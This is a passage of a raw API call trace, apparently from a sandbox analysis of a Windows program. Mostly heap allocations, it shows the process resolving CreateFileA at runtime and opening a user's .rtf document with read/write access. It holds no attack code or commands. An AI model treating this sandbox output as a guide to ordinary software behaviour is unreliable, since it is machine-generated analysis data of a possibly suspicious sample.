RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.689] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.692] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd708 [0178.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd708, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.693] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0178.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.693] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0178.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0178.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpUsedDefaultChar=0x0) returned 84 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.695] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\1usrk9.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa8) returned 0x8fcbc0 [0178.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x8fcbc0, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf") returned 84 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.702] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 